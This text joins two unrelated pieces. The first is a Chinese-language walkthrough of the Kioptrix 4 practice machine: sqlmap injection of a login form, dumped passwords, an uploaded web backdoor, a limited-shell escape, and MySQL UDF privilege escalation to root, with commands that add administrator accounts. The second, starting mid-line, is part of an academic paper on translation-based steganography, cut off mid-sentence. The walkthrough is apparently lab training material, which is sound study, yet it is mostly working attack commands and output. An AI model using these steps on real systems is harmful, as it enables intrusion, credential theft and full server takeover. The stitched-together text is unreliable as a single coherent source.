a total of 253 HTTP(s) requests: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login --- [02:00:45] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL >= 5.0.12 [02:00:45] [INFO] fetching current user [02:00:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [02:00:45] [INFO] retrieved: root@localhost current user: 'root@localhost' [02:00:45] [INFO] fetching current database [02:00:45] [INFO] retrieved: members current database: 'members' [02:00:45] [INFO] testing if current user is DBA [02:00:45] [INFO] fetching current user current user is DBA: True [02:00:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/' [*] shutting down at 02:00:45 通过注入得到用户名和密码 Database: members Table: members [2 entries] +----+----------+-----------------------+ | id | username | password | +----+----------+-----------------------+ | 1 | john | MyNameIsJohn | | 2 | robert | ADGAdsafdfwt4gadfga== | +----+----------+-----------------------+ 通过 --os-shell 写入一个 webshell 。 root@kali:~# sqlmap -u -- data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --os-shell ___ __H__ ___ ___[']_____ ___ ___ {1.2.4#stable} |_ -| . [.] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 02:09:06 [02:09:06] [INFO] resuming back-end DBMS 'mysql' [02:09:06] [INFO] testing connection to the target URL [02:09:06] [INFO] heuristics detected web page charset 'ascii' sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login --- [02:09:06] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL >= 5.0.12 [02:09:06] [INFO] going to use a web backdoor for command prompt [02:09:06] [INFO] fingerprinting the back-end DBMS operating system [02:09:06] [INFO] the back-end DBMS operating system is Linux which web application language does the web server support? [1] ASP [2] ASPX [3] JSP [4] PHP (default) > 4 [02:09:08] [INFO] retrieved the web server document root: '/var/www' [02:09:08] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php' [02:09:08] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method [02:09:08] [INFO] the file stager has been successfully uploaded on '/var/www/' - [02:09:08] [WARNING] unable to upload the file through the web file stager to '/var/www/' [02:09:08] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers do you want to try the same method used for the file stager? [Y/n] [02:09:09] [INFO] the backdoor has been successfully uploaded on '/var/www/' - [02:09:09] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> id do you want to retrieve the command standard output? [Y/n/a] command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)' os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] command standard output: 'www-data' os-shell> cat checklogin.php do you want to retrieve the command standard output? [Y/n/a] command standard output: --- <?php ob_start(); $host="localhost"; // Host name $username="root"; // Mysql username $password=""; // Mysql password $db_name="members"; // Database name $tbl_name="members"; // Table name 但是权限很小。但是得到了数据库的账号密码。 通过SSH连接 利用SQL注入得到的用户名密码SSH登录。 root@kali:~# ssh john@ The authenticity of host ' (' can't be established. RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '' (RSA) to the list of known hosts. john@'s password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don't screw up Type '?' or 'help' to get the list of allowed commands john:~$ id *** unknown command: id john:~$ ? cd clear echo exit help ll lpath ls john:~$ help help Limited Shell (lshell) limited help. Cheers. 从这里我们可以利用的命令有 cd clear echo exit help ll lpath ls 重点其中有一个是 echo 。 我们可以利用他得到一个 bash交互shell john:~$ echo os.system('/bin/bash') john@Kioptrix4:~$ id uid=1001(john) gid=1001(john) groups=1001(john) 权限还是当前用户的权限。 MySQL数据库提权 利用SQL注入得到的数据库账号密码登录MySQL数据库。 john@Kioptrix4:~$ mysql -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 3520 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> status; -------------- mysql Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2 Connection id: 3520 Current database: Current user: root@localhost SSL: Not in use Current pager: stdout Using outfile: '' Using delimiter: ; Server version: 5.0.51a-3ubuntu5.4 (Ubuntu) Protocol version: 10 Connection: Localhost via UNIX socket Server characterset: latin1 Db characterset: latin1 Client characterset: latin1 Conn. characterset: latin1 UNIX socket: /var/run/mysqld/mysqld.sock Uptime: 1 hour 10 min 47 sec 尝试 mysql udf 提权 。 在Windows环境下,执行命令 USE mysql; CREATE TABLE npn(line blob); INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll')); SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll'; CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll'; SELECT sys_exec("net user npn npn12345678 /add"); SELECT sys_exec("net localgroup Administrators npn /add"); 实现提权。 我们在实验环境下进行Linux环境下的UDF提权操作。 首先找到 lib_mysqludf_sys.so 的目录。 john@Kioptrix4:~$ whereis lib_mysqludf_sys.so lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so mysql> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; ERROR 1125 (HY000): Function 'sys_exec' already exists mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out'); ERROR 2006 (HY000): MySQL server has gone away No connection. Trying to reconnect... Connection id: 1 Current database: mysql +-----------------------------------------------------+ | sys_exec('id > /tmp/out; chown john.john /tmp/out') | +-----------------------------------------------------+ | NULL | +-----------------------------------------------------+ 1 row in set (0.00 sec) mysql> quit Bye john@Kioptrix4:~$ cat /tmp/out uid=0(root) gid=0(root) 这样就将 sys_exec() 函数执行的结果写入到了 /tmp/out 下。 得知可以得到root权限。 可以写一个c语言程序进行命令执行 #include <stdio.h> #include <sys/types.h> #include <unistd.h> int main(void) { setuid(0); setgid(0); system(“/bin/bash”); } 本地编译上传到目标靶机。 这里我用wget下载好像一下连接超时。可能是防火墙阻止流量。 mysql> SELECT sys_exec('usermod -a -G admin'); ERROR 2013 (HY000): Lost connection to MySQL server during query mysql> SELECT sys_exec('usermod -a -G admin john'); ERROR 2006 (HY000): MySQL server has gone away No connection. Trying to reconnect... Connection id: 1 Current database: mysql +--------------------------------------+ | sys_exec('usermod -a -G admin john') | +--------------------------------------+ | NULL | +--------------------------------------+ 1 row in set (0.07 sec) 利用 SELECT sys_exec('usermod -a -G admin'); 将 john 加入管理员组 john@Kioptrix4:/tmp$ sudo su [sudo] password for john: root@Kioptrix4:/tmp# id uid=0(root) gid=0(root) groups=0(root) root@Kioptrix4:/tmp# whoami root 这样我们得到了root权限。
Translation-Based Steganography Christian Grothoff Krista Grothoff Ludmila Alkhutova Ryan Stutsman Mikhail Atallah CERIAS, Purdue University {christian,krista}@grothoff.org, {lalkhuto,rstutsma}@purdue.edu,mja@cs.purdue.edu Abstract. This paper investigates the possibilities of steganographically embedding information in the “noise” created by automatic translation of natural language documents. Because the inherent redundancy of nat- ural language creates plenty of room for variation in translation, machine translation is ideal for steganographic applications. Also, because there are frequent errors in legitimate automatic text translations, additional errors inserted by an information hiding mechanism are plausibly unde- tectable and would appear to be part of the normal noise associated with translation. Significantly, it should be extremely difficult for an adver- sary to determine if inaccuracies in the translation are caused by the use of steganography or by deficiencies of the translation software. 1 Introduction This paper presents a new protocol for covert message transfer in natural lan- guage text, for which we have a proof-of-concept implementation. The key idea is to hide information in the noise that occurs invariably in natural language trans- lation. When translating a non-trivial text between a pair of natural languages, there are typically many possible translations. Selecting one of these transla- tions can be used to encode information. In order for an adversary to detect the hidden message transfer, the adversary would have to show that the generated translation containing the hidden message could not be plausibly generated by ordinary translation. Because natural language translation is particularly noisy, this is inherently difficult. For example, the existence of synonyms frequently allows for multiple correct translations of the same text. The possibility of er- roneous translations increases the number of plausible variations and thus the opportunities for hiding information. This paper evaluates the potential of covert message transfer in natural lan- guage translation that uses automatic machine translation (MT). In order to characterize which variations in machine translations are plausible, we have looked into the different kinds of errors that are generated by various MT sys- tems. Some of the variations that were observed in the machine translations are also clearly plausible for manual translations by humans. In addition to making it difficult for the adversary to detect the presence of a hidden message, translation-based steganography is also easier to use. The rea- son for this is that unlike previous text-, image- or sound-based steganographic 2 C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah systems, the substrate does not have to be secret. In translation-based steganog- raphy, the original text in the source language can be publically known, obtained from public sources, and, together with the translation, exchanged between the two parties in plain sight of the adversary. In traditional image steganography, the problem often occurs that the source image in which the message is sub- sequently hidden must be kept secret by the sender and used only once (as otherwise a “diff” attack would reveal the presence of a hidden message). This burdens the user with creating a new, secret substrate for each message. Translation-based steganography does not suffer from this drawback, since the adversary cannot apply a differential analysis to a translation to detect the hidden message. The adversary may produce a translation of the original mes- sage, but the translation is likely to differ regardless of the use of steganography, making the differential analysis useless for detecting a hidden message. To demonstrate this, we have implemented a steganographic encoder and decoder. The system hides messages by changing machine translations in ways that are similar to the variations and errors that were observed in the existing MT systems. An interactive version of the prototype is available on our webpage.1 The remainder of the paper is structured as follows. First, Section 2 reviews related work. In Section 3, the basic protocol of the steganographic exchange is described. In Section 4, we give a characterization of errors produced in existing machine translation systems. The implementation and some experimental results are sketched in Section 5. In Section 6, we discuss variations on the basic protocol, together with various attacks and possible defenses. 2 Related Work The goal of both steganography and watermarking is to embed information into a digital object, also referred to as the substrate, in such a manner that the information becomes part of the object. It is understood that the embedding process should not significantly degrade the quality of the substrate. Stegano- graphic and watermarking schemes are categorized by the type of data that the substrate belongs to, such as text, images or sound. 2.1 Steganography In steganography, the very existence of the message must not be detectable. A successful attack consists of detecting the existence of the hidden message, even without removing it (or learning what it is). This can be done through, for example, sophisticated statistical analyses and comparisons of objects with and without hidden information. Traditional linguistic steganography has used limited syntactically-correct text generation [29] (sometimes with the addition of so-called “style templates”) and semantically-equivalent word substitutions within an existing plaintext as a 1 http://www.cs.purdue.edu/homes/rstutsma/stego/ Translation-Based Steganography 3 medium in which to hide messages. Wayner [29,30] introduced the notion of using precomputed context-free grammars as a method of generating steganographic text without sacrificing syntactic and semantic correctness. Note that semantic correctness is only guaranteed if the manually constructed grammar enforces the production of semantically cohesive text. Chapman and Davida [6] improved on the simple generation of syntactically correct text by syntactically tagging large corpora of homogeneous data in order to generate grammatical “style tem- plates”; these templates were used to generate text which not only had syntactic and lexical variation, but whose consistent register and “style” could potentially pass a casual reading by a human observer. Chapman et al [7], later developed a technique in which semantically equivalent substitutions were made in known plaintexts in order to encode messages. Semantically-driven information hiding is a relatively recent innovation, as described for watermarking schemes in Atallah et al [4]. Wayner [29,30] detailed text-based approaches that are strictly statisti- cal in nature. However, in general, linguistic approaches to steganography have been relatively limited. Damage to language is relatively easy for a human to detect. It does not take much modification of a text to make it ungrammatical in a native speaker’s judgement; furthermore, even syntactically correct texts can violate semantic constraints. Non-linguistic approaches to steganography have sometimes used lower-order bits in images and sound encodings to hide the data, providing a certain amount of freedom in the encoding in which to hide information [30]. The problem with these approaches is that the information is easily destroyed (the encoding lacks robustness, which is a particular problem for watermarking), that the original data source (for example the original image) must not be disclosed to avoid easy detection, and that a statistical analysis can still often detect the use of steganography (see, e.g., [13,18,20,25,30], to mention a few). 2.2 Watermarking The intended purpose of the watermark largely dictates the design goals for wa- termarking schemes. The possible uses of watermarking include inserting owner- ship information, inserting purchaser information, detecting modification, plac- ing caption information and so on. One such decision is whether the watermark should be visible or indiscernible. For example, a copyright mark need not be hidden; in fact, a visible digital watermark can act as a deterrent to an attacker. Most of the literature has focused on indiscernible watermarks. Watermarks are usually designed to withstand a wide range of attacks that aim at removing or modifying the watermark without significantly damaging the usefulness of the object. A resilient watermark is one that is hard to remove by an adversary without damaging the object to an unaceptable extent. However, it is sometimes the case that a fragile watermark is desirable, one that is destroyed by even a small alteration; this occurs when watermarking is used for the purpose of making the object tamper-evident (for integrity protection). The case where the watermark has to be different for each copy of the digital object, is called fingerprinting. That is, fingerprinting embeds a unique message 4 C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah in each instance of the digital object (usually the message makes it possible to trace a pirated version back to the original culprit). Fingerprinting is easier to attack because two differently marked copies often make possible an attack that consists of comparing the two differently marked copies (the attacker’s goal is then to create a usable copy that has neither one of the two marks). Although watermarks can be embedded in any digital object, by far most of the published research on watermarking has dealt with media such as images, audio or video. There is some literature on watermarking other object types like software [9,10,11], databases [1,26], and natural language text [3,4]. 2.3 Machine Translation Most Machine Translation (MT) systems in use today are statistical MT systems based on models derived from a corpus, transfer systems that are based on linguistic rules for the translations, or hybrid systems that combine the two approaches. Other translation methodologies, such as semantic MT exist, but are not considered further as they are not commonly available at this time. In statistical MT [2,5], the system is trained using a bilingual parallel corpus to construct a translation model. The translation model gives the translator sta- tistical information about likely word alignments. A word alignment [23,24] is a correspondence between words in the source sentence and the target sentence. For example, for English-French translations, the system “learns” that the En- glish word “not” typically corresponds to the two French words “ne pas”. The statistical MT systems are also trained with a uni-lingual corpus in the target language to construct a language model which is used to estimate what con- structions are common in the target language. The translator then performs an approximate search in the space of all possible translations, trying to maximize the likelihood of the translation to score high in both the translation model and the language model. The selection of the training data for the construction of the models is crucial for the quality of the statistical MT system. 3 Protocol The basic steganographic protocol for this paper works as follows. The sender first needs to obtain a substrate text in the source language. The substrate does not have to be secret and can be obtained from public sources - for example, a news website. The sender then translates the sentences in the source text into the target language using the steganographic encoder. The steganographic encoder essentially creates multiple translations for each sentence and selects one of these to encode bits from the hidden message. The translated text is then transmitted to the receiver, together with information that is sufficient to obtain the source text. This can either be the source text itself or a reference to the source. The receiver then also performs the translation of the source text using the same steganographic encoder configuration. By comparing the resulting sentences, the Translation-Based Steganography 5 substrate source secret configuration translators hidden data translations hidden data encode decode Alice translation substrate source Bob Fig. 1. Illustration of the basic protocol. The adversary can observe the public news and the message between Alice and Bob containing the selected translation and the (possibly public) substrate source. receiver reconstructs the bitstream of the hidden message. Figure 1 illustrates the basic protocol. The adversary is assumed to know about the existence of this basic protocol and is also able to obtain the source text and to perform translations. It is not practical for the adversary to flag all seemingly machine-translated messages which do not correspond exactly to translations generated from the cover source by well-known MT systems. There are two reasons for this. First, there are too many variants of MT software out there (frequently produced by “tweaking” existing ones), many of which are not advertised or made public. Second, even if there was a single universal MT software copy that everyone uses, there are still wildly differing behaviors for it depending on the corpus on which it is trained – there are too many such potential corpora to track, especially as users seek better translation quality by using a corpus particularly suited to their application domain (e.g., news stories about home construction costs and markets). The adversary does not have access to the specific configuration of the stegano- graphic encoder (which acts like a secret key). This configuration consists of ev- erything that determines which translations are generated, such as the specific translation algorithms, the corpora used to train any user-generated translation systems which may be employed, rules, and dictionaries. It is assumed that the secret is transmitted using standard secret-sharing protocols and the specifics are not covered here. However, it should be noted that the size of the secret that is transmitted is flexible, based upon the user’s choices; users can choose to simply share information about the settings of the encoder, or might choose to transmit entire corpora used to train a user-generated MT system. This varies based upon individual users’ needs. As with most steganographic systems, the hidden message itself can be en- crypted with a secret key, making it harder for the adversary to perform guessing 6 C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah attacks on the secret configuration (as configurations of the steganographic sys- tem result in a random bitstream for the hidden message). 3.1 Producing translations The first step for both sender and receiver after obtaining the source text is to produce multiple translations of the source text using the same algorithm. The goal of this step is to deterministically produce multiple different translations of the source text. The simplest approach to achieve this is to apply (a subset of) all available MT systems on each sentence in the source text. If the parties have full access to the code of a statistical MT system, they can generate multiple MT systems from the same codebase by training it with different corpora. In addition to generating different sentences using multiple translation sys- tems it is also possible to apply post-processing on the resulting translations to obtain additional variations. Such post-processing includes transformations that mimic the noise inherent in any (MT) translation. For example, post-processors could insert common translation mistakes (as discussed in Section 4). As translation quality differs between different engines and also depends on which post-processors were applied to manipulate the result, the translation system uses a heuristic to assign a probability to each translation that describes its relative quality compared to the other translations. The heuristic can be based on both experience with the generators and algorithms that rank sentence quality based on language models [8]. The specific set of translation engines, training corpora and post-processing operations that are used to generate the translations and their ranking are part of the secret shared by the two parties that want to carry out the covert communication. 3.2 Selecting a translation When selecting a translation to encode the hidden message, the encoder first builds a Huffman tree [17] of the available translations using the probabilities assigned by the generator algorithm. Then the algorithm selects the sentence that corresponds to the bit-sequence that is to be encoded.2 Using a Huffman tree to select sentences in accordance with their translation quality estimate ensures that sentences that are assumed to have a low trans- lation quality are selected less often. Furthermore, the lower the quality of the selected translation, the higher the number of transmitted bits. This reduces the total amount of substrate text required and thus the amount of text the adversary can analyze. The encoder can use a lower limit on the relative translation quality to eliminate sentences from consideration where the estimated translation quality is below a certain threshold, in which case that threshold becomes part of the shared secret between sender and receiver. 2 Wayner [29,30] uses Huffman trees in a similar manner to generate statistically plau- sible substrate texts on a letter-by-letter basis. Translation-Based Steganography 7 3.3 Keeping the source text secret The presented scheme can be adapted to be suitable for watermarking where it would be desirable to keep the source text secret. This can be achieved as follows. The encoder computes a (cryptographic) hash of each translated sentence. It then selects a sentence such that the last bit of the hash of the translated sentence corresponds to the next bit in the hidden message that is to be transmitted. The decoder then just computes the hash codes of the received sentences and concatenates the respective lowest bits to obtain the hidden message. This scheme assumes that sentences are long enough to almost always have enough variation to obtain a hash with the desired lowest bit. Error-correcting codes must be used to correct errors whenever none of the sentences produces an acceptable hash code. Using this variation reduces the bitrate that can be achieved by the encoding. More details on this can be found in Section 6. 4 Lost in Translation Modern MT systems produce a number of common errors in translations. This section characterizes some of these errors. While the errors we describe are not a comprehensive list of possible errors, they are representative of the types of errors we commonly observed in our sample translations. Most of these errors are caused by the reliance on statistical and syntactic text analysis by contemporary MT systems, resulting in a lack of semantic and contextual awareness. This produces an array of error types that we can use to plausibly alter text, generating further marking possibilities. 4.1 Functional Words One class of errors that occurs rather frequently without destroying meaning is that of incorrectly-translated or omitted closed-class words such as articles, pronouns, and prepositions. Because these functional words are often strongly associated with some other word or phrase in the sentence, complex construc- tions often seem to lead to errors in the translation of such words. Furthermore, different languages handle these words very differently, leading to translation errors when using engines that do not handle these differences. For example, languages without articles, such as Russian, can produce article- omission errors when translating to a language which has articles, like English: “Behind sledge cheerfully to run” [12]. Even if articles are included, they often have the wrong sense of definiteness (“a”instead of“the”, and vice-versa). Finally, if both languages have articles these articles are sometimes omitted in translations where the constructions become complex enough to make the noun phrase the article is bound to unclear. Many languages use articles in front of some nouns, but not others. This causes problems when translating from languages that do use articles in front of the latter set of nouns. For example, the French sentence “La vie est paralys´ee.” 8 C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah translates to “Life is paralyzed.” in English. However, translation engines pre- dictably translate this as “The life is paralyzed.”. “life” in the sense of “life in general” does not take an article in English. This is the same with many mass nouns like “water” and “money”, causing similar errors. Furthermore, because articles are also used as pronouns in many languages, they are often mistranslated as such. Many of these languages also indicate gender with articles and pronouns, such that if “the armchair” is male, it might be referred to as “he” (in English) at the beginning of the next sentence, instead of “it”. But because no context is kept by todays MT engines, if there is a man being discussed in the previous sentence, he may also become an “it” in the next. For example, the following two sentences were translated from a German article into English with Systran (The“Avineri”mentioned is a political scientist cited in the article): “Avineri ist nicht nur skeptisch. Er ist gleichzeitig auch optimistisch.” is translated as “Avineri is not only sceptical. It is at the same time also optimistic.” [22,28]. This lack of context makes correctly translating such words difficult. Prepositions are also notoriously tricky; often, the correct choice of prepo- sition depends entirely on the context of the sentence. For example, “J’habite `a 100 m`etres de lui” in French means “I live 100 meters from him” in English. However, [28] translates this as “I live with 100 meters of him”, and [12] trans- lates it as “In live in 100 meters of him.” Both use a different translation of “`a” (“with/in”) which is entirely inappropriate to the context. “Il est mort `a 92 ans”(“He died at 92 years”) is given by [28,12] as“He died in 92 years”. To say “He waits for me” in German, one generally says “Er wartet auf mich”. [28] chooses to omit the preposition (“auf” entirely, making the sentence incorrect (effectively, “He waits me.”) Similarly, “Bei der Hochzeit waren viele Freunde” (“Many friends were at the wedding”) yields “With the wedding were many friends.” In each of these cases, a demonstrably incorrect translation (in context) for the preposition occurs. Another example is the following: in German, “nach Hause” and “zu Hause” both translate roughly into English as “home”. The difference between the two is that one means “towards home” and the other means “at home”. Because we can say in English “I’m going home” and “I’m staying home”, we don’t need to mention “towards” or “at”. When translating these two sentences to German without explicitly stating “at home” in the second sentence, however, the engines we examined produced incoherent sentences. [12] translated it as“Ich bleibe nach Hause” (“I’m staying to home”), and [28] rendered a completely nonsensical “Ich bleibe Haupt” (“I’m staying head”). 4.2 Grammar Errors Sometimes, even more basic grammar fails. While this may simply be a measure of a sentence being so complicated that a verb’s subject cannot be found, it is still quite noticeable when, for example, the wrong conjugation of a verb is used. In the following translation, “It appeared concerned about the expressions of the presidency candidate the fact that it do not fight the radical groups in the Gaza Translation-Based Steganography 9 Strip” [22,28], the third-person singular subject appears directly before the verb, and still the wrong form of the verb is chosen. 4.3 Word-for-Word Translations One phenomenon which occurs again and again is the use of partial or complete word-for-word translations of constructions which are not grammatically correct in the target language. At best, this only results in word-order issues: “Was aber erwartet Israel wirklich von den Pal¨astinensern nach der Wahl am 9.1.?” (“But what does Israel really expect from the Palestians after the election on Jan- uary 9?”) is translated by [28] as “What however really expects Israel from the Palestinians after the choice on 9.1.?” In this case, the meaning is not hampered because the construction is fairly simple, and the words translate well between the two languages. However, in a language like Russian where possession is indi- cated by something being “at” the owner, translation for things like “I have the pencils” in Russian come out as “the pencils are at me” in a word-for-word En- glish translation. Unnatural constructions based on word-for-word translations are by far the most noticeable flaw in many of the translations we looked at. 4.4 Blatant Word Choice Errors Less frequently, a completely unrelated word or phrase is chosen in the transla- tion. For example, “I’m staying home” and “I am staying home” are both trans- lated into German by [28] as “Ich bleibe Haupt” (“I’m staying head”) instead of “Ich bleibe zu Hause”. These are different from semantic errors and reflect some sort of flaw in the actual engine or its dictionary, clearly impacting translation quality. 4.5 Context and Semantics As mentioned previously, the fact that most translation systems do not keep context makes translation problematic. The Bare Bones Guide to HTML [31] is a document giving basic web page authoring information. When the simplified Chinese translation of this document’s entry for an HTML “Menu List” is trans- lated into English, however, the result is “The vegetable unitarily enumerates” [33,28]. While one can see that whatever the Chinese phrase for “Menu List” is might in fact have something to do with a vegetable, the context information should lead to a choice that does not have to do with food. Similarly, the German translation ([28]) of“I ran through the woods”gives a translation (“Ich lief durch das Holz”) that implies running through the substance “wood”, not the “forest” sense. Without having enough contextual information, either based on statistics or the preceding verb/preposition combination, the translator is unable to decide that a forest is more likely to be run through than lumber is, and chooses the wrong word. 10 C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah 4.6 Additional Errors Several other interesting error types were encountered which, for space reasons, we will only describe briefly. – In many cases, words that are not in the source dictionary simply go untrans- lated; for example, an English translation of the registration for a Dutch news site gives “These can contain no spaties or leestekens” for “Deze mag geen spaties of leestekens bevatten.” – Many languages use reflexive verbs to describe certain actions which are not reflexive in other languages; the reflexive article is often translated regardless of whether it is needed in the second language (e.g. “Ich kaemme mich” becomes “I comb myself”). – Proper names which also translate to common words are sometimes trans- lated; “Linda es muy Linda” (“Linda is very beautiful”) is translated by [28] as “It is continguous is very pretty” and “Pretty it is very pretty” by [12]. Moving the name does not always stop it from being translated, even when capitalized. – Verb tense is often inexact in translation, as there is often no direct mapping between verb tenses in different languages. 4.7 Translations between Typologically Dissimilar Languages Typologically distant languages are languages whose formal structures differ rad- ically from one another. These structural differences manifest themselves in many areas (e.g. syntax (phrase and sentence structure), semantics (meaning structure) and morphology (word structure)). Not surprisingly, because of these differences, translations between languages that are typologically distant (Chinese and En- glish, English and Arabic, etc) are frequently so bad as to be incoherent or unreadable. We did not consider these languages for this work, since the trans- lation quality is often so poor that exchange of the resulting translations would likely be implausible. For example, when translating the “Bare Bones Guide to HTML” page from Japanese [32] to English, [28] gives“Chasing order, link to the HTML guide whom it explained and is superior WWW Help Page is reference.” (Note that italicized portions were already in English on the Japanese page) The original English from which the Japanese was manually translated reads: “If you’re looking for more detailed step-by-step information, see my WWW Help Page.” The original English sentence is provided only for general meaning here, but it is clear that what is translated into English by the MT system is incomprehensible. Because many translation systems were originally designed as a rough “first pass”for human translators who know both languages, it may well be that know- ing the original language makes it possible to understand what is meant in the translation; in some sense, translators using such a tool would have to consciously or unconsciously be aware of the error types generated by the translation tool in order to produce accurate translations from it. While we did not explore these Translation-Based Steganography 11 error types for this paper, an area for future improvement would be to look into the error types in various language pairs by asking bilinguals about the translations. 5 Implementation This section describes some of the aspects of the implementation with focus on the different techniques that are used to obtain variations in the generated translations. 5.1 Translation Engines The current implementation uses different translation services that are available on the Internet to obtain an initial translation. The current implementation supports three different services, and we plan on adding more in the future. Adding a new service only requires writing a function that translates a given sentence from a source language to the target language. Which subset of the available MT services should be used is up to the user to decide, but at least one engine must be selected. A possible problem with selecting multiple different translation engines is that they might have distinct error characteristics (for example, one engine might not translate words with contractions). An adversary that is aware of such prob- lems with a specific machine translation system might find out that half of all sentences have errors that match those characteristics. Since a normal user is unlikely to alternate between different translation engines, this would reveal the presence of a hidden message. A better alternative is to use the same machine translation software but train it with different corpora. The specific corpora become part of the secret key used by the steganographic encoder; this use of a corpus as a key was previously dis- cussed in another context [4]. As such, the adversary could no longer detect differences that are the result of a different machine translation algorithm. One problem with this approach is that acquiring good corpora is expensive. Further- more, dividing a single corpus to generate multiple smaller corpora will result in worse translations, which can again lead to suspicious texts. That said, having full control over the translation engine may also allow for minor variations in the translation algorithm itself. For example, the GIZA++ system offers mul- tiple algorithms for computing translations [14]. These algorithms mostly differ in how translation “candidate outcomes” are generated. Changing these options can also help to generate multiple translations. After obtaining one or more translations from the translation engines, the tool produces additional variations using various post-processing algorithms. Prob- lems with using multiple engines can be avoided by just using one high-quality translation engine and relying on the post-processing to generate alternative translations. 12 C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah 5.2 Semantic Substitution Semantic substitution is one highly effective post-pass and has been used in previous approaches to hide information [4,7]. One key difference from previous work is that errors arising from semantic substitution are more plausible in translations compared to semantic substitutions in an ordinary text. A typical problem with traditional semantic substitution is the need for sub- stitution lists. A substitution list is a list of tuples consisting of words that are semantically close enough that subtituting one word for another in an arbitrary sentence is possible. For traditional semantic substitution, these lists are gen- erated by hand. An example of a pair of words in a semantic substitution list would be comfortable and convenient. Not only is constructing substitution lists by hand tedious, but the lists must also be conservative in what they con- tain. For example, general substitution lists cannot contain word pairs such as bright and light since light could have been used in a different sense (meaning effortless, unexacting or even used as a noun). Semantic substitution on translations does not have this problem. Using the original sentence, it is possible to automatically generate semantic substitutions that can even contain some of the cases mentioned above (which could not be added to a general monolingual substitution list). The basic idea is to trans- late back and forth between two languages to find semantically similar words. Assuming that the translation is accurate, the word in the source language can help provide the necessary contextual information to limit the substitutions to words that are semantically close in the current context. d1 e1 w1 e2 w2 e3 Fig. 2. Example for a translation graph produced by the semantic substitution discovery algorithm. Here two witnesses (w1 and w2) and the original word d1 confirm the semantic proximity of e1 and e2. There is no witness for e3, making e3 an unlikely candidate for semantic substitution. Suppose the source language is German (d) and the target language of the translation is English (e). The original sentence contains a German word d1 and the translation contains a word e1 which is a translation of d1. The basic algorithm is the following: Translation-Based Steganography 13 – Find all other translations of d1, call this set Ed1. Ed1 is the set of candidates for semantic substitution. Naturally e1 ∈ Ed1. – Find all translations of e1, call this set De1. This set is called the set of witnesses. – For each word e ∈ Ed1 − {e1} find all translations De and count the number of elements in De ∩ De1. If that number is above a given threshold t, add e to the list of possible semantic substitutes for e1. A witness is a word in the source language that also translates to both words in the target language, thereby confirming the semantic proximity of the two words. The witness threshold t can be used to trade-off more possible substitu- tions against a higher potential for inappropriate substitutions. The threshold does not have to be fixed. A heuristic can be used to increase the threshold if the number of possible substitutions for a word or in a sentence is extraordinarily high. Since the number of bits that can be encoded only increases with log2 n for n possible substitutions we suggest to increase t whenever n is larger than 8. Examples: Given the German word “fein” and the English translation “nice”, the association algorithm run on the LEO (http://dict.leo.org/) dictionary gives the following semantic substitutions: for three witnesses, only “pretty” is gener- ated; for two witnesses, “fine” is added; for just one witness, the list grows by “acute”, “capillary”, “dignified” and “keen”. Without witnesses (direct transla- tions), the dictionary adds “smooth” and “subtle”. The word-pair “leicht” and ”light” gives “slight” (for three witnesses). However, “licht” and “light” gives “bright” and “clear”. In both cases the given substitutions match the semantics of the specific German word. 5.3 Adding plausible mistakes Another possible post-pass adds mistakes that are commonly made by MT sys- tems to the translations. The transformations that our implementation can use are based on the study of MT mistakes from section 4. The current system sup- ports changing articles and prepositions using hand-crafted, language specific 